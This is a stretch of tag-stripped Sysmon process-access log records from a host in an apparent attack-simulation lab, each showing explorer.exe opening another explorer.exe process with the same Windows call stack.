16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236178Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236177Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236176Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236175Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236174Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236173Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236172Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236171Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236170Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236169Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236168Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236167Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236166Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236165Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236164Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236163Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236162Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236161Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236160Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236159Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236158Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 